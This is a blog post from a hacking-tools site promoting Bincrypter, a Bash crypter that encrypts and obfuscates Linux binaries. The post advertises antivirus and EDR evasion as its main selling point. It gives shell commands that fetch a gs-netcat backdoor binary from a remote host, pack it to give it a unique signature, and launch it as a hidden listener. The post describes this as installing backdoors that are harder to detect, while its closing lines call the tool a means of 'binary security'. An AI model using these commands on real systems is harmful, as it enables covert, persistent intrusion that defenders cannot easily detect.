Hacking Tools

Bincrypter : Enhancing Linux Binary Security through Runtime Encryption And Obfuscation

Bincrypter is a powerful Linux binary runtime crypter written in BASH. It is designed to obfuscate and encrypt ELF binaries and #!-scripts, providing a robust layer of protection against reverse engineering and detection by antivirus and endpoint detection and response (EDR) systems.

Key Features Of Bincrypter

  • Obfuscation and Encryption: Bincrypter can encrypt and obfuscate any ELF binary or #!-script, making it difficult for attackers to reverse-engineer the code. The resulting binary is heavily obfuscated, with strings appearing as garbage, which complicates analysis.
  • AV/EDR Evasion: The tool employs morphing techniques to change the binary’s signature every time it is executed. This makes it challenging for AV/EDR systems to detect the binary as malicious, as its signature is always different.
  • In-Memory Operation: Bincrypter operates entirely in memory without creating temporary files. This ensures that the filesystem remains clean and reduces the risk of leaving behind evidence of its use.
  • Multi-Layer Encryption: It supports double or triple encryption of the same binary, further enhancing its security features. This allows for multiple layers of protection against unauthorized access.
  • Architecture Agnostic: Bincrypter is compatible with various architectures, including x86_64, aarch64, arm6, and mips. This versatility makes it suitable for use across different platforms.
  • Living Off the Land (LOTL): The tool relies only on standard system tools like /bin/sh, perl, and openssl, which are typically available on most Linux systems. This approach minimizes dependencies and makes it easier to deploy in various environments.

To use Bincrypter, you can download the script from GitHub and execute it with the binary you want to encrypt. Here’s an example:

bash# Download the script
curl -SsfL https://github.com/hackerschoice/bincrypter/raw/refs/heads/main/bincrypter.sh -o bincrypter.sh
chmod +x bincrypter.sh

# Encrypt the 'id' binary
cp /usr/bin/id id
./bincrypter.sh id

# Optionally, set a custom password
cp /usr/bin/id id
./bincrypter.sh id foobar

Bincrypter can be used in scenarios where maintaining the integrity and confidentiality of binaries is crucial. For instance, it can be used to install backdoors with unique signatures, making them harder to detect:

bashcurl -SsfL "https://gsocket.io/bin/gs-netcat_mini-linux-$(uname -m)" | PASSWORD="foobar" ./bincrypter.sh >gsnc
chmod +x gsnc
PASSWORD="foobar" GS_ARGS="-ilD -s ChangeMe" ./gsnc

Bincrypter is a versatile tool for protecting Linux binaries from reverse engineering and detection.

Its ability to operate in memory, support multiple encryption layers, and evade AV/EDR systems makes it a valuable asset in maintaining binary security.

However, like any powerful tool, it should be used responsibly and ethically.

Varshini

Varshini is a Cyber Security expert in Threat Analysis, Vulnerability Assessment, and Research. Passionate about staying ahead of emerging Threats and Technologies.

Recent Posts

How to Install Docker on Ubuntu (Step-by-Step Guide)

Docker is a powerful open-source containerization platform that allows developers to build, test, and deploy…

4 days ago

Uninstall Docker on Ubuntu

Docker is one of the most widely used containerization platforms. But there may come a…

4 days ago

Admin Panel Dorks : A Complete List of Google Dorks

Introduction Google Dorking is a technique where advanced search operators are used to uncover information…

5 days ago

Log Analysis Fundamentals

Introduction In cybersecurity and IT operations, logging fundamentals form the backbone of monitoring, forensics, and…

6 days ago

Networking Devices 101: Understanding Routers, Switches, Hubs, and More

What is Networking? Networking brings together devices like computers, servers, routers, and switches so they…

1 week ago

Sock Puppets in OSINT: How to Build and Use Research Accounts

Introduction In the world of Open Source Intelligence (OSINT), anonymity and operational security (OPSEC) are…

1 week ago